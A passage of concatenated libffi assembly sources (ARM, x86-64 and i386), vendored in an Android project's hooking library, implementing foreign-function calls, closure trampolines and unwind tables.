#ifdef __clang__
vldr d0, [r2]
#else
ldc p11, cr0, [r2] @ vldr d0, [r2]
#endif
ldm sp, {sp,pc}
E(ARM_TYPE_VFP_N)
#ifdef __clang__
vldm r2, {d0-d3}
#else
ldc p11, cr0, [r2], {8} @ vldm r2, {d0-d3}
#endif
ldm sp, {sp,pc}
E(ARM_TYPE_INT64)
ldr r1, [r2, #4]
nop
E(ARM_TYPE_INT)
ldr r0, [r2]
ldm sp, {sp,pc}
E(ARM_TYPE_VOID)
ldm sp, {sp,pc}
nop
E(ARM_TYPE_STRUCT)
ldm sp, {sp,pc}
cfi_endproc
ARM_FUNC_END(ffi_closure_ret)
#if FFI_EXEC_TRAMPOLINE_TABLE
#ifdef __MACH__
#include <mach/machine/vm_param.h>
.align PAGE_MAX_SHIFT
ARM_FUNC_START(ffi_closure_trampoline_table_page)
.rept PAGE_MAX_SIZE / FFI_TRAMPOLINE_SIZE
adr ip, #-PAGE_MAX_SIZE @ the config page is PAGE_MAX_SIZE behind the trampoline page
sub ip, #8 @ account for pc bias
ldr pc, [ip, #4] @ jump to ffi_closure_SYSV or ffi_closure_VFP
.endr
ARM_FUNC_END(ffi_closure_trampoline_table_page)
#endif
#else
ARM_FUNC_START(ffi_arm_trampoline)
0: adr ip, 0b
ldr pc, 1f
1: .long 0
ARM_FUNC_END(ffi_arm_trampoline)
#endif /* FFI_EXEC_TRAMPOLINE_TABLE */
#if defined __ELF__ && defined __linux__
.section .note.GNU-stack,"",%progbits
#endif
#endif
|
aimardcr/APKKiller
| 15,785
|
app/src/main/cpp/whale/src/libffi/x86/unix64_x86_64.S
|
#ifdef __x86_64__
/* -----------------------------------------------------------------------
unix64.S - Copyright (c) 2013 The Written Word, Inc.
- Copyright (c) 2008 Red Hat, Inc
- Copyright (c) 2002 Bo Thorsen <bo@suse.de>
x86-64 Foreign Function Interface
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#ifdef __x86_64__
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include "internal64.h"
#include "asmnames.h"
.text
/* This macro allows the safe creation of jump tables without an
actual table. The entry points into the table are all 8 bytes.
The use of ORG asserts that we're at the correct location. */
/* ??? The clang assembler doesn't handle .org with symbolic expressions. */
#if defined(__clang__) || defined(__APPLE__) || (defined (__sun__) && defined(__svr4__))
# define E(BASE, X) .balign 8
#else
# define E(BASE, X) .balign 8; .org BASE + X * 8
#endif
/* ffi_call_unix64 (void *args, unsigned long bytes, unsigned flags,
void *raddr, void (*fnaddr)(void));
Bit o trickiness here -- ARGS+BYTES is the base of the stack frame
for this function. This has been allocated by ffi_call. We also
deallocate some of the stack that has been alloca'd. */
.balign 8
.globl C(ffi_call_unix64)
FFI_HIDDEN(C(ffi_call_unix64))
C(ffi_call_unix64):
L(UW0):
movq (%rsp), %r10 /* Load return address. */
leaq (%rdi, %rsi), %rax /* Find local stack base. */
movq %rdx, (%rax) /* Save flags. */
movq %rcx, 8(%rax) /* Save raddr. */
movq %rbp, 16(%rax) /* Save old frame pointer. */
movq %r10, 24(%rax) /* Relocate return address. */
movq %rax, %rbp /* Finalize local stack frame. */
/* New stack frame based off rbp. This is a itty bit of unwind
trickery in that the CFA *has* changed. There is no easy way
to describe it correctly on entry to the function. Fortunately,
it doesn't matter too much since at all points we can correctly
unwind back to ffi_call. Note that the location to which we
moved the return address is (the new) CFA-8, so from the
perspective of the unwind info, it hasn't moved. */
L(UW1):
/* cfi_def_cfa(%rbp, 32) */
/* cfi_rel_offset(%rbp, 16) */
movq %rdi, %r10 /* Save a copy of the register area. */
movq %r8, %r11 /* Save a copy of the target fn. */
movl %r9d, %eax /* Set number of SSE registers. */
/* Load up all argument registers. */
movq (%r10), %rdi
movq 0x08(%r10), %rsi
movq 0x10(%r10), %rdx
movq 0x18(%r10), %rcx
movq 0x20(%r10), %r8
movq 0x28(%r10), %r9
movl 0xb0(%r10), %eax
testl %eax, %eax
jnz L(load_sse)
L(ret_from_load_sse):
/* Deallocate the reg arg area, except for r10, then load via pop. */
leaq 0xb8(%r10), %rsp
popq %r10
/* Call the user function. */
call *%r11
/* Deallocate stack arg area; local stack frame in redzone. */
leaq 24(%rbp), %rsp
movq 0(%rbp), %rcx /* Reload flags. */
movq 8(%rbp), %rdi /* Reload raddr. */
movq 16(%rbp), %rbp /* Reload old frame pointer. */
L(UW2):
/* cfi_remember_state */
/* cfi_def_cfa(%rsp, 8) */
/* cfi_restore(%rbp) */
/* The first byte of the flags contains the FFI_TYPE. */
cmpb $UNIX64_RET_LAST, %cl
movzbl %cl, %r10d
leaq L(store_table)(%rip), %r11
ja L(sa)
leaq (%r11, %r10, 8), %r10
/* Prep for the structure cases: scratch area in redzone. */
leaq -20(%rsp), %rsi
jmp *%r10
.balign 8
L(store_table):
E(L(store_table), UNIX64_RET_VOID)
ret
E(L(store_table), UNIX64_RET_UINT8)
movzbl %al, %eax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_UINT16)
movzwl %ax, %eax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_UINT32)
movl %eax, %eax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_SINT8)
movsbq %al, %rax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_SINT16)
movswq %ax, %rax
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_SINT32)
cltq
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_INT64)
movq %rax, (%rdi)
ret
E(L(store_table), UNIX64_RET_XMM32)
movd %xmm0, (%rdi)
ret
E(L(store_table), UNIX64_RET_XMM64)
movq %xmm0, (%rdi)
ret
E(L(store_table), UNIX64_RET_X87)
fstpt (%rdi)
ret
E(L(store_table), UNIX64_RET_X87_2)
fstpt (%rdi)
fstpt 16(%rdi)
ret
E(L(store_table), UNIX64_RET_ST_XMM0_RAX)
movq %rax, 8(%rsi)
jmp L(s3)
E(L(store_table), UNIX64_RET_ST_RAX_XMM0)
movq %xmm0, 8(%rsi)
jmp L(s2)
E(L(store_table), UNIX64_RET_ST_XMM0_XMM1)
movq %xmm1, 8(%rsi)
jmp L(s3)
E(L(store_table), UNIX64_RET_ST_RAX_RDX)
movq %rdx, 8(%rsi)
L(s2):
movq %rax, (%rsi)
shrl $UNIX64_SIZE_SHIFT, %ecx
rep movsb
ret
.balign 8
L(s3):
movq %xmm0, (%rsi)
shrl $UNIX64_SIZE_SHIFT, %ecx
rep movsb
ret
L(sa): call PLT(C(abort))
/* Many times we can avoid loading any SSE registers at all.
It's not worth an indirect jump to load the exact set of
SSE registers needed; zero or all is a good compromise. */
.balign 2
L(UW3):
/* cfi_restore_state */
L(load_sse):
movdqa 0x30(%r10), %xmm0
movdqa 0x40(%r10), %xmm1
movdqa 0x50(%r10), %xmm2
movdqa 0x60(%r10), %xmm3
movdqa 0x70(%r10), %xmm4
movdqa 0x80(%r10), %xmm5
movdqa 0x90(%r10), %xmm6
movdqa 0xa0(%r10), %xmm7
jmp L(ret_from_load_sse)
L(UW4):
ENDF(C(ffi_call_unix64))
/* 6 general registers, 8 vector registers,
32 bytes of rvalue, 8 bytes of alignment. */
#define ffi_closure_OFS_G 0
#define ffi_closure_OFS_V (6*8)
#define ffi_closure_OFS_RVALUE (ffi_closure_OFS_V + 8*16)
#define ffi_closure_FS (ffi_closure_OFS_RVALUE + 32 + 8)
/* The location of rvalue within the red zone after deallocating the frame. */
#define ffi_closure_RED_RVALUE (ffi_closure_OFS_RVALUE - ffi_closure_FS)
.balign 2
.globl C(ffi_closure_unix64_sse)
FFI_HIDDEN(C(ffi_closure_unix64_sse))
C(ffi_closure_unix64_sse):
L(UW5):
subq $ffi_closure_FS, %rsp
L(UW6):
/* cfi_adjust_cfa_offset(ffi_closure_FS) */
movdqa %xmm0, ffi_closure_OFS_V+0x00(%rsp)
movdqa %xmm1, ffi_closure_OFS_V+0x10(%rsp)
movdqa %xmm2, ffi_closure_OFS_V+0x20(%rsp)
movdqa %xmm3, ffi_closure_OFS_V+0x30(%rsp)
movdqa %xmm4, ffi_closure_OFS_V+0x40(%rsp)
movdqa %xmm5, ffi_closure_OFS_V+0x50(%rsp)
movdqa %xmm6, ffi_closure_OFS_V+0x60(%rsp)
movdqa %xmm7, ffi_closure_OFS_V+0x70(%rsp)
jmp L(sse_entry1)
L(UW7):
ENDF(C(ffi_closure_unix64_sse))
.balign 2
.globl C(ffi_closure_unix64)
FFI_HIDDEN(C(ffi_closure_unix64))
C(ffi_closure_unix64):
L(UW8):
subq $ffi_closure_FS, %rsp
L(UW9):
/* cfi_adjust_cfa_offset(ffi_closure_FS) */
L(sse_entry1):
movq %rdi, ffi_closure_OFS_G+0x00(%rsp)
movq %rsi, ffi_closure_OFS_G+0x08(%rsp)
movq %rdx, ffi_closure_OFS_G+0x10(%rsp)
movq %rcx, ffi_closure_OFS_G+0x18(%rsp)
movq %r8, ffi_closure_OFS_G+0x20(%rsp)
movq %r9, ffi_closure_OFS_G+0x28(%rsp)
#ifdef __ILP32__
movl FFI_TRAMPOLINE_SIZE(%r10), %edi /* Load cif */
movl FFI_TRAMPOLINE_SIZE+4(%r10), %esi /* Load fun */
movl FFI_TRAMPOLINE_SIZE+8(%r10), %edx /* Load user_data */
#else
movq FFI_TRAMPOLINE_SIZE(%r10), %rdi /* Load cif */
movq FFI_TRAMPOLINE_SIZE+8(%r10), %rsi /* Load fun */
movq FFI_TRAMPOLINE_SIZE+16(%r10), %rdx /* Load user_data */
#endif
L(do_closure):
leaq ffi_closure_OFS_RVALUE(%rsp), %rcx /* Load rvalue */
movq %rsp, %r8 /* Load reg_args */
leaq ffi_closure_FS+8(%rsp), %r9 /* Load argp */
call PLT(C(ffi_closure_unix64_inner))
/* Deallocate stack frame early; return value is now in redzone. */
addq $ffi_closure_FS, %rsp
L(UW10):
/* cfi_adjust_cfa_offset(-ffi_closure_FS) */
/* The first byte of the return value contains the FFI_TYPE. */
cmpb $UNIX64_RET_LAST, %al
movzbl %al, %r10d
leaq L(load_table)(%rip), %r11
ja L(la)
leaq (%r11, %r10, 8), %r10
leaq ffi_closure_RED_RVALUE(%rsp), %rsi
jmp *%r10
.balign 8
L(load_table):
E(L(load_table), UNIX64_RET_VOID)
ret
E(L(load_table), UNIX64_RET_UINT8)
movzbl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_UINT16)
movzwl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_UINT32)
movl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_SINT8)
movsbl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_SINT16)
movswl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_SINT32)
movl (%rsi), %eax
ret
E(L(load_table), UNIX64_RET_INT64)
movq (%rsi), %rax
ret
E(L(load_table), UNIX64_RET_XMM32)
movd (%rsi), %xmm0
ret
E(L(load_table), UNIX64_RET_XMM64)
movq (%rsi), %xmm0
ret
E(L(load_table), UNIX64_RET_X87)
fldt (%rsi)
ret
E(L(load_table), UNIX64_RET_X87_2)
fldt 16(%rsi)
fldt (%rsi)
ret
E(L(load_table), UNIX64_RET_ST_XMM0_RAX)
movq 8(%rsi), %rax
jmp L(l3)
E(L(load_table), UNIX64_RET_ST_RAX_XMM0)
movq 8(%rsi), %xmm0
jmp L(l2)
E(L(load_table), UNIX64_RET_ST_XMM0_XMM1)
movq 8(%rsi), %xmm1
jmp L(l3)
E(L(load_table), UNIX64_RET_ST_RAX_RDX)
movq 8(%rsi), %rdx
L(l2):
movq (%rsi), %rax
ret
.balign 8
L(l3):
movq (%rsi), %xmm0
ret
L(la): call PLT(C(abort))
L(UW11):
ENDF(C(ffi_closure_unix64))
.balign 2
.globl C(ffi_go_closure_unix64_sse)
FFI_HIDDEN(C(ffi_go_closure_unix64_sse))
C(ffi_go_closure_unix64_sse):
L(UW12):
subq $ffi_closure_FS, %rsp
L(UW13):
/* cfi_adjust_cfa_offset(ffi_closure_FS) */
movdqa %xmm0, ffi_closure_OFS_V+0x00(%rsp)
movdqa %xmm1, ffi_closure_OFS_V+0x10(%rsp)
movdqa %xmm2, ffi_closure_OFS_V+0x20(%rsp)
movdqa %xmm3, ffi_closure_OFS_V+0x30(%rsp)
movdqa %xmm4, ffi_closure_OFS_V+0x40(%rsp)
movdqa %xmm5, ffi_closure_OFS_V+0x50(%rsp)
movdqa %xmm6, ffi_closure_OFS_V+0x60(%rsp)
movdqa %xmm7, ffi_closure_OFS_V+0x70(%rsp)
jmp L(sse_entry2)
L(UW14):
ENDF(C(ffi_go_closure_unix64_sse))
.balign 2
.globl C(ffi_go_closure_unix64)
FFI_HIDDEN(C(ffi_go_closure_unix64))
C(ffi_go_closure_unix64):
L(UW15):
subq $ffi_closure_FS, %rsp
L(UW16):
/* cfi_adjust_cfa_offset(ffi_closure_FS) */
L(sse_entry2):
movq %rdi, ffi_closure_OFS_G+0x00(%rsp)
movq %rsi, ffi_closure_OFS_G+0x08(%rsp)
movq %rdx, ffi_closure_OFS_G+0x10(%rsp)
movq %rcx, ffi_closure_OFS_G+0x18(%rsp)
movq %r8, ffi_closure_OFS_G+0x20(%rsp)
movq %r9, ffi_closure_OFS_G+0x28(%rsp)
#ifdef __ILP32__
movl 4(%r10), %edi /* Load cif */
movl 8(%r10), %esi /* Load fun */
movl %r10d, %edx /* Load closure (user_data) */
#else
movq 8(%r10), %rdi /* Load cif */
movq 16(%r10), %rsi /* Load fun */
movq %r10, %rdx /* Load closure (user_data) */
#endif
jmp L(do_closure)
L(UW17):
ENDF(C(ffi_go_closure_unix64))
/* Sadly, OSX cctools-as doesn't understand .cfi directives at all. */
#ifdef __APPLE__
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EHFrame0:
#elif defined(HAVE_AS_X86_64_UNWIND_SECTION_TYPE)
.section .eh_frame,"a",@unwind
#else
.section .eh_frame,"a",@progbits
#endif
#ifdef HAVE_AS_X86_PCREL
# define PCREL(X) X - .
#else
# define PCREL(X) X@rel
#endif
/* Simplify advancing between labels. Assume DW_CFA_advance_loc1 fits. */
#define ADV(N, P) .byte 2, L(N)-L(P)
.balign 8
L(CIE):
.set L(set0),L(ECIE)-L(SCIE)
.long L(set0) /* CIE Length */
L(SCIE):
.long 0 /* CIE Identifier Tag */
.byte 1 /* CIE Version */
.ascii "zR\0" /* CIE Augmentation */
.byte 1 /* CIE Code Alignment Factor */
.byte 0x78 /* CIE Data Alignment Factor */
.byte 0x10 /* CIE RA Column */
.byte 1 /* Augmentation size */
.byte 0x1b /* FDE Encoding (pcrel sdata4) */
.byte 0xc, 7, 8 /* DW_CFA_def_cfa, %rsp offset 8 */
.byte 0x80+16, 1 /* DW_CFA_offset, %rip offset 1*-8 */
.balign 8
L(ECIE):
.set L(set1),L(EFDE1)-L(SFDE1)
.long L(set1) /* FDE Length */
L(SFDE1):
.long L(SFDE1)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW0)) /* Initial location */
.long L(UW4)-L(UW0) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW1, UW0)
.byte 0xc, 6, 32 /* DW_CFA_def_cfa, %rbp 32 */
.byte 0x80+6, 2 /* DW_CFA_offset, %rbp 2*-8 */
ADV(UW2, UW1)
.byte 0xa /* DW_CFA_remember_state */
.byte 0xc, 7, 8 /* DW_CFA_def_cfa, %rsp 8 */
.byte 0xc0+6 /* DW_CFA_restore, %rbp */
ADV(UW3, UW2)
.byte 0xb /* DW_CFA_restore_state */
.balign 8
L(EFDE1):
.set L(set2),L(EFDE2)-L(SFDE2)
.long L(set2) /* FDE Length */
L(SFDE2):
.long L(SFDE2)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW5)) /* Initial location */
.long L(UW7)-L(UW5) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW6, UW5)
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte ffi_closure_FS + 8, 1 /* uleb128, assuming 128 <= FS < 255 */
.balign 8
L(EFDE2):
.set L(set3),L(EFDE3)-L(SFDE3)
.long L(set3) /* FDE Length */
L(SFDE3):
.long L(SFDE3)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW8)) /* Initial location */
.long L(UW11)-L(UW8) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW9, UW8)
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte ffi_closure_FS + 8, 1 /* uleb128, assuming 128 <= FS < 255 */
ADV(UW10, UW9)
.byte 0xe, 8 /* DW_CFA_def_cfa_offset 8 */
L(EFDE3):
.set L(set4),L(EFDE4)-L(SFDE4)
.long L(set4) /* FDE Length */
L(SFDE4):
.long L(SFDE4)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW12)) /* Initial location */
.long L(UW14)-L(UW12) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW13, UW12)
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte ffi_closure_FS + 8, 1 /* uleb128, assuming 128 <= FS < 255 */
.balign 8
L(EFDE4):
.set L(set5),L(EFDE5)-L(SFDE5)
.long L(set5) /* FDE Length */
L(SFDE5):
.long L(SFDE5)-L(CIE) /* FDE CIE offset */
.long PCREL(L(UW15)) /* Initial location */
.long L(UW17)-L(UW15) /* Address range */
.byte 0 /* Augmentation size */
ADV(UW16, UW15)
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte ffi_closure_FS + 8, 1 /* uleb128, assuming 128 <= FS < 255 */
.balign 8
L(EFDE5):
#ifdef __APPLE__
.subsections_via_symbols
.section __LD,__compact_unwind,regular,debug
/* compact unwind for ffi_call_unix64 */
.quad C(ffi_call_unix64)
.set L1,L(UW4)-L(UW0)
.long L1
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
/* compact unwind for ffi_closure_unix64_sse */
.quad C(ffi_closure_unix64_sse)
.set L2,L(UW7)-L(UW5)
.long L2
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
/* compact unwind for ffi_closure_unix64 */
.quad C(ffi_closure_unix64)
.set L3,L(UW11)-L(UW8)
.long L3
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
/* compact unwind for ffi_go_closure_unix64_sse */
.quad C(ffi_go_closure_unix64_sse)
.set L4,L(UW14)-L(UW12)
.long L4
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
/* compact unwind for ffi_go_closure_unix64 */
.quad C(ffi_go_closure_unix64)
.set L5,L(UW17)-L(UW15)
.long L5
.long 0x04000000 /* use dwarf unwind info */
.quad 0
.quad 0
#endif
#endif /* __x86_64__ */
#if defined __ELF__ && defined __linux__
.section .note.GNU-stack,"",@progbits
#endif
#endif
|
aimardcr/APKKiller
| 29,291
|
app/src/main/cpp/whale/src/libffi/x86/sysv_i386.S
|
#ifdef __i386__
/* -----------------------------------------------------------------------
sysv.S - Copyright (c) 2017 Anthony Green
- Copyright (c) 2013 The Written Word, Inc.
- Copyright (c) 1996,1998,2001-2003,2005,2008,2010 Red Hat, Inc.
X86 Foreign Function Interface
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#ifndef __x86_64__
#ifndef _MSC_VER
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#include "internal.h"
#define C2(X, Y) X ## Y
#define C1(X, Y) C2(X, Y)
#ifdef __USER_LABEL_PREFIX__
# define C(X) C1(__USER_LABEL_PREFIX__, X)
#else
# define C(X) X
#endif
#ifdef X86_DARWIN
# define L(X) C1(L, X)
#else
# define L(X) C1(.L, X)
#endif
#ifdef __ELF__
# define ENDF(X) .type X,@function; .size X, . - X
#else
# define ENDF(X)
#endif
/* Handle win32 fastcall name mangling. */
#ifdef X86_WIN32
# define ffi_call_i386 @ffi_call_i386@8
# define ffi_closure_inner @ffi_closure_inner@8
#else
# define ffi_call_i386 C(ffi_call_i386)
# define ffi_closure_inner C(ffi_closure_inner)
#endif
/* This macro allows the safe creation of jump tables without an
actual table. The entry points into the table are all 8 bytes.
The use of ORG asserts that we're at the correct location. */
/* ??? The clang assembler doesn't handle .org with symbolic expressions. */
#if defined(__clang__) || defined(__APPLE__) || (defined (__sun__) && defined(__svr4__))
# define E(BASE, X) .balign 8
#else
# define E(BASE, X) .balign 8; .org BASE + X * 8
#endif
.text
.balign 16
.globl ffi_call_i386
FFI_HIDDEN(ffi_call_i386)
/* This is declared as
void ffi_call_i386(struct call_frame *frame, char *argp)
__attribute__((fastcall));
Thus the arguments are present in
ecx: frame
edx: argp
*/
ffi_call_i386:
L(UW0):
# cfi_startproc
#if !HAVE_FASTCALL
movl 4(%esp), %ecx
movl 8(%esp), %edx
#endif
movl (%esp), %eax /* move the return address */
movl %ebp, (%ecx) /* store %ebp into local frame */
movl %eax, 4(%ecx) /* store retaddr into local frame */
/* New stack frame based off ebp. This is a itty bit of unwind
trickery in that the CFA *has* changed. There is no easy way
to describe it correctly on entry to the function. Fortunately,
it doesn't matter too much since at all points we can correctly
unwind back to ffi_call. Note that the location to which we
moved the return address is (the new) CFA-4, so from the
perspective of the unwind info, it hasn't moved. */
movl %ecx, %ebp
L(UW1):
# cfi_def_cfa(%ebp, 8)
# cfi_rel_offset(%ebp, 0)
movl %edx, %esp /* set outgoing argument stack */
movl 20+R_EAX*4(%ebp), %eax /* set register arguments */
movl 20+R_EDX*4(%ebp), %edx
movl 20+R_ECX*4(%ebp), %ecx
call *8(%ebp)
movl 12(%ebp), %ecx /* load return type code */
movl %ebx, 8(%ebp) /* preserve %ebx */
L(UW2):
# cfi_rel_offset(%ebx, 8)
andl $X86_RET_TYPE_MASK, %ecx
#ifdef __PIC__
call C(__x86.get_pc_thunk.bx)
L(pc1):
leal L(store_table)-L(pc1)(%ebx, %ecx, 8), %ebx
#else
leal L(store_table)(,%ecx, 8), %ebx
#endif
movl 16(%ebp), %ecx /* load result address */
jmp *%ebx
.balign 8
L(store_table):
E(L(store_table), X86_RET_FLOAT)
fstps (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_DOUBLE)
fstpl (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_LDOUBLE)
fstpt (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_SINT8)
movsbl %al, %eax
mov %eax, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_SINT16)
movswl %ax, %eax
mov %eax, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_UINT8)
movzbl %al, %eax
mov %eax, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_UINT16)
movzwl %ax, %eax
mov %eax, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_INT64)
movl %edx, 4(%ecx)
/* fallthru */
E(L(store_table), X86_RET_INT32)
movl %eax, (%ecx)
/* fallthru */
E(L(store_table), X86_RET_VOID)
L(e1):
movl 8(%ebp), %ebx
movl %ebp, %esp
popl %ebp
L(UW3):
# cfi_remember_state
# cfi_def_cfa(%esp, 4)
# cfi_restore(%ebx)
# cfi_restore(%ebp)
ret
L(UW4):
# cfi_restore_state
E(L(store_table), X86_RET_STRUCTPOP)
jmp L(e1)
E(L(store_table), X86_RET_STRUCTARG)
jmp L(e1)
E(L(store_table), X86_RET_STRUCT_1B)
movb %al, (%ecx)
jmp L(e1)
E(L(store_table), X86_RET_STRUCT_2B)
movw %ax, (%ecx)
jmp L(e1)
/* Fill out the table so that bad values are predictable. */
E(L(store_table), X86_RET_UNUSED14)
ud2
E(L(store_table), X86_RET_UNUSED15)
ud2
L(UW5):
# cfi_endproc
ENDF(ffi_call_i386)
/* The inner helper is declared as
void ffi_closure_inner(struct closure_frame *frame, char *argp)
__attribute_((fastcall))
Thus the arguments are placed in
ecx: frame
edx: argp
*/
/* Macros to help setting up the closure_data structure. */
#if HAVE_FASTCALL
# define closure_FS (40 + 4)
# define closure_CF 0
#else
# define closure_FS (8 + 40 + 12)
# define closure_CF 8
#endif
#define FFI_CLOSURE_SAVE_REGS \
movl %eax, closure_CF+16+R_EAX*4(%esp); \
movl %edx, closure_CF+16+R_EDX*4(%esp); \
movl %ecx, closure_CF+16+R_ECX*4(%esp)
#define FFI_CLOSURE_COPY_TRAMP_DATA \
movl FFI_TRAMPOLINE_SIZE(%eax), %edx; /* copy cif */ \
movl FFI_TRAMPOLINE_SIZE+4(%eax), %ecx; /* copy fun */ \
movl FFI_TRAMPOLINE_SIZE+8(%eax), %eax; /* copy user_data */ \
movl %edx, closure_CF+28(%esp); \
movl %ecx, closure_CF+32(%esp); \
movl %eax, closure_CF+36(%esp)
#if HAVE_FASTCALL
# define FFI_CLOSURE_PREP_CALL \
movl %esp, %ecx; /* load closure_data */ \
leal closure_FS+4(%esp), %edx; /* load incoming stack */
#else
# define FFI_CLOSURE_PREP_CALL \
leal closure_CF(%esp), %ecx; /* load closure_data */ \
leal closure_FS+4(%esp), %edx; /* load incoming stack */ \
movl %ecx, (%esp); \
movl %edx, 4(%esp)
#endif
#define FFI_CLOSURE_CALL_INNER(UWN) \
call ffi_closure_inner
#define FFI_CLOSURE_MASK_AND_JUMP(N, UW) \
andl $X86_RET_TYPE_MASK, %eax; \
leal L(C1(load_table,N))(, %eax, 8), %edx; \
movl closure_CF(%esp), %eax; /* optimiztic load */ \
jmp *%edx
#ifdef __PIC__
# if defined X86_DARWIN || defined HAVE_HIDDEN_VISIBILITY_ATTRIBUTE
# undef FFI_CLOSURE_MASK_AND_JUMP
# define FFI_CLOSURE_MASK_AND_JUMP(N, UW) \
andl $X86_RET_TYPE_MASK, %eax; \
call C(__x86.get_pc_thunk.dx); \
L(C1(pc,N)): \
leal L(C1(load_table,N))-L(C1(pc,N))(%edx, %eax, 8), %edx; \
movl closure_CF(%esp), %eax; /* optimiztic load */ \
jmp *%edx
# else
# define FFI_CLOSURE_CALL_INNER_SAVE_EBX
# undef FFI_CLOSURE_CALL_INNER
# define FFI_CLOSURE_CALL_INNER(UWN) \
movl %ebx, 40(%esp); /* save ebx */ \
L(C1(UW,UWN)): \
/* cfi_rel_offset(%ebx, 40); */ \
call C(__x86.get_pc_thunk.bx); /* load got register */ \
addl $C(_GLOBAL_OFFSET_TABLE_), %ebx; \
call ffi_closure_inner@PLT
# undef FFI_CLOSURE_MASK_AND_JUMP
# define FFI_CLOSURE_MASK_AND_JUMP(N, UWN) \
andl $X86_RET_TYPE_MASK, %eax; \
leal L(C1(load_table,N))@GOTOFF(%ebx, %eax, 8), %edx; \
movl 40(%esp), %ebx; /* restore ebx */ \
L(C1(UW,UWN)): \
/* cfi_restore(%ebx); */ \
movl closure_CF(%esp), %eax; /* optimiztic load */ \
jmp *%edx
# endif /* DARWIN || HIDDEN */
#endif /* __PIC__ */
.balign 16
.globl C(ffi_go_closure_EAX)
FFI_HIDDEN(C(ffi_go_closure_EAX))
C(ffi_go_closure_EAX):
L(UW6):
# cfi_startproc
subl $closure_FS, %esp
L(UW7):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
movl 4(%eax), %edx /* copy cif */
movl 8(%eax), %ecx /* copy fun */
movl %edx, closure_CF+28(%esp)
movl %ecx, closure_CF+32(%esp)
movl %eax, closure_CF+36(%esp) /* closure is user_data */
jmp L(do_closure_i386)
L(UW8):
# cfi_endproc
ENDF(C(ffi_go_closure_EAX))
.balign 16
.globl C(ffi_go_closure_ECX)
FFI_HIDDEN(C(ffi_go_closure_ECX))
C(ffi_go_closure_ECX):
L(UW9):
# cfi_startproc
subl $closure_FS, %esp
L(UW10):
# cfi_def_cfa_offset(closure_FS + 4)
FFI_CLOSURE_SAVE_REGS
movl 4(%ecx), %edx /* copy cif */
movl 8(%ecx), %eax /* copy fun */
movl %edx, closure_CF+28(%esp)
movl %eax, closure_CF+32(%esp)
movl %ecx, closure_CF+36(%esp) /* closure is user_data */
jmp L(do_closure_i386)
L(UW11):
# cfi_endproc
ENDF(C(ffi_go_closure_ECX))
